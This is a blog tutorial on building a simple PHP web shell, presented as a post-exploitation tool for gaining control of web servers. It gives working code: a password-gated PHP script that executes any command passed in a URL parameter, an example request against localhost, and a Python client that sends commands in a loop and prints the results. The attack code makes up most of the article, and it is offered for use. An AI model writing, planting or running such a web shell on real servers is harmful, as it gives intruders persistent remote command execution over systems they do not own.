Thilan Dissanayaka Application Security Mar 23

Build A Simple Web shell

A web shell is a type of code that hackers use to gain control over a web server. It is particularly useful for post-exploitation attacks, and there are various types of web shells available. Some of them work with PHP environments, while others work on ASP servers. Additionally, some web shells provide a reverse connection, while others offer a bind connection.

One of the most well-known examples of a web shell is c99. In this article, we'll focus on developing a basic web shell that works in a PHP environment.

So why do we need a web shell? Essentially, its primary purpose is to help with post-exploitation tasks.

Before we dive into the specifics of how to develop a web shell, let's go over some essential concepts. At its core, a web shell's primary function is to run specified commands on a server. In the context of a PHP environment, this means we need to figure out how to execute system commands using PHP scripts.

Basic shell with HTTP parameters

As the first part of our tutorial, we are going to build every basic PHP web shell with the help of HTTP. This can be executed using a web browser or a client program and HTTP requests. First, let's build it and discuss some tricks to improve our shell.

    <?php;
    define('PASSWORD', 'f8b60df48fae35dfa126a1b6ccc3ceed');

    function auth($password)
    {
        $input_password_hash = md5($password);

        if (strcmp(PASSWORD, $input_password_hash) == 0) {
            return TRUE;
        }else{
            return FALSE;
        }
    }

    if (isset($_GET['cmd']) && !empty($_GET['cmd']) && isset($_GET['password'])) {

        if (auth($_GET['password'])) {
                echo '<pre>'. exec($_GET['cmd']) .'<pre>';
        }else{
            die('Access denide!');
        }
    }

    ?>

This is a PHP script that acts as a shell, which allows the user to execute arbitrary commands on the web server where it's hosted. The script expects two parameters to be passed as part of the URL query string: 'cmd' and 'password'.

The 'cmd' parameter specifies the command that we want to execute on the server, while the 'password' parameter is used to authenticate the user. We have to give the correct password to execute the command. If the password provided matches the predefined password hash, the script will execute the command and return the output to the user. If the password is incorrect, the script will deny access to the user.

The script uses the md5 hashing algorithm to store the predefined password in a hashed format, which makes it harder for an attacker to determine the actual password by looking at the source code.

for example, we can use the following URL to execute a command in the backend server using our shell script.

http://127.0.0.1/shell.php?password=hacksland&cmd;=ls

As the next step, we are going to build a little Python script to access the shell. Using this script is very easy than accessing a shell from a web browser.

Let's see how we can do this with the requested library.


    import requests
    from bs4 import BeautifulSoup

    target = "http://127.0.0.1/shell.php"
    password = "hacksland"
    while 1:
        cmd = str(input("$ "))
        try:
            r = requests.get(target, params={'cmd': cmd, 'password':password})
            soup = BeautifulSoup(r.text, 'html.parser')
            print(soup.pre.text)
        except requests.exceptions.RequestException as e:
            print(e)
            sys.exit(1)

This is a Python script that demonstrates how to use the web shell we discussed earlier. The script imports the 'requests' and 'BeautifulSoup' libraries, which are used to send HTTP requests and parse HTML content, respectively.

The script specifies the URL of the web shell as the 'target' variable, and sets the password as 'hacksland'. It then enters an infinite loop that prompts the user to input a command to execute on the server.

For each iteration of the loop, the script sends an HTTP GET request to the web shell URL with the specified command and password parameters. If the request is successful, the response text is parsed using BeautifulSoup, and the output of the command is printed to the console.

If there is an exception thrown during the request, such as a connection error, the script prints the error message and exits.

Overall, this script provides a simple way to interact with a web shell from a Python environment.

ALSO READ
ACID Properties in Databases: The Key to Reliable Transactions
Apr 25 Database Systems
ACID Properties in Databases: The Key to Reliable Transactions

When working with databases, one thing is absolutely critical: keeping your data safe, consistent, and reliable. That's where ACID properties come in — a set of principles that ensure every....

Common Web Application Technologies
Feb 11 Application Security
Common Web Application Technologies

# JWT - JSON Web Tokens JWT is short for JSON Web Token. It is a compact and secure way to send information between two parties – like a client (browser) and a server. We usually use JWTs....

Remote Command Execution
Mar 23 Application Security
Remote Command Execution

Remote Command Execution (RCE) is a critical security vulnerability that allows an attacker to execute arbitrary commands on a remote server. This vulnerability can lead to unauthorized access, data....

Abstract Factory Pattern explained simply
Apr 26 Software Architecture
Abstract Factory Pattern explained simply

When you want to create **families of related objects** without specifying their concrete classes, the **Abstract Factory Pattern** is your best friend. --- ## What is the Abstract Factory....

Build A Simple Web shell
Mar 23 Application Security
Build A Simple Web shell

A web shell is a type of code that hackers use to gain control over a web server. It is particularly useful for post-exploitation attacks, and there are various types of web shells available. Some of....

Netcat The Hacker's Swiss Army Knife
May 02 Penetration Testing
Netcat The Hacker's Swiss Army Knife

Netcat, often abbreviated as `nc`, is a versatile command-line networking tool that can be used for almost anything related to TCP, UDP, or UNIX-domain sockets. It's beloved by network engineers,....

ABOUT

Dive deep into the fascinating world of cybersecurity — where knowledge is power, and every byte matters.

Explore expertly written articles on system exploitation, web application hacking, exploit development, malware analysis, cryptography, and more.

CATEGORIES